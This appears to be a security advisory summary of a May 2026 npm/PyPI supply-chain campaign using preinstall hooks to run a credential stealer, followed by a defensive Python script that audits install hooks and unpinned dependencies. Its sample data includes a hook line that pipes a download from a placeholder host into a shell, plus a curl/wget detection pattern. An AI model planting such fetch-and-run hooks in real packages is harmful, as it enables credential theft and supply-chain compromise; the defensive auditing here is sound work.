The Mini Shai-Hulud supply chain campaign has returned with its largest wave, compromising 172 unique packages across 403 malicious versions on npm and PyPI within a 48-hour window on May 11-12, 2026. High-profile scopes affected include @tanstack, @uipath, @mistralai, and @opensearch-project. The attack uses a preinstall hook to download a Bun runtime and run an obfuscated JavaScript credential stealer targeting SSH keys, cloud credentials (AWS, Azure, GCP, Kubernetes), npm/GitHub tokens, CI/CD environment variables, and AI tool configs. Stolen npm tokens are then used to self-propagate by publishing new compromised versions. Developers are advised to check dependencies installed during that window, rotate all credentials, pin package versions using lockfiles, and monitor for unauthorized publishes. Mend has issued three advisories covering all 172 affected packages.
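A defender-side audit for two of the mitigations named above, added here as an example (not code from the report or from Mend): it lists every installed npm package that declares an install-time lifecycle hook, marks for review any hook that fetches over the network or invokes bun (a constructed heuristic, not an indicator from the campaign), and lists direct dependencies declared with a range rather than an exact version. The sample project tree it scans is constructed inline; the package names and the `example.invalid` URL are placeholders.

```python
import json
import re
import tempfile
from pathlib import Path

HOOKS = ("preinstall", "install", "postinstall")
# Constructed review heuristic (an assumption, not an indicator from the report): an
# install hook that fetches over the network or invokes bun deserves a human look,
# since downloading a Bun runtime from a preinstall hook is the pattern described.
SUSPICIOUS = re.compile(r"\b(curl|wget|bun)\b", re.IGNORECASE)
EXACT = re.compile(r"^\d+\.\d+\.\d+(?:[-+][0-9A-Za-z.-]+)?$")  # exact semver, no range


def find_install_hooks(node_modules):
    """Return (name, version, hook, command, needs_review) for every package under
    node_modules that declares an install-time lifecycle script."""
    findings = []
    for pkg_json in sorted(Path(node_modules).rglob("package.json")):
        try:
            data = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (ValueError, OSError):
            continue  # not a readable package manifest
        scripts = data.get("scripts") or {}
        for hook in HOOKS:
            cmd = scripts.get(hook)
            if cmd:
                findings.append((data.get("name", pkg_json.parent.name), data.get("version", "?"),
                                 hook, cmd, bool(SUSPICIOUS.search(cmd))))
    return findings


def unpinned_dependencies(package_json):
    """Return dependency names declared with a range (^, ~, *, >=) instead of an exact version."""
    data = json.loads(Path(package_json).read_text(encoding="utf-8"))
    return sorted(name for field in ("dependencies", "devDependencies")
                  for name, spec in (data.get(field) or {}).items() if not EXACT.match(spec))


def build_sample_tree():
    """Constructed sample project: a native-build package and a hook that fetches a runtime."""
    root = Path(tempfile.mkdtemp())
    (root / "package.json").write_text(json.dumps(
        {"dependencies": {"native-lib": "1.2.3", "left-pad": "^1.0.0"}}))
    for name, scripts in (("native-lib", {"install": "node-gyp rebuild"}),
                          ("left-pad", {"preinstall": "curl -fsSL https://example.invalid/bun | sh"})):
        (root / "node_modules" / name).mkdir(parents=True)
        (root / "node_modules" / name / "package.json").write_text(
            json.dumps({"name": name, "version": "1.0.0", "scripts": scripts}))
    return root
```

Run `find_install_hooks` against a real `node_modules` and `unpinned_dependencies` against the project's `package.json`; a flagged hook is a prompt to read the script, not a verdict, since native-build packages legitimately use these hooks.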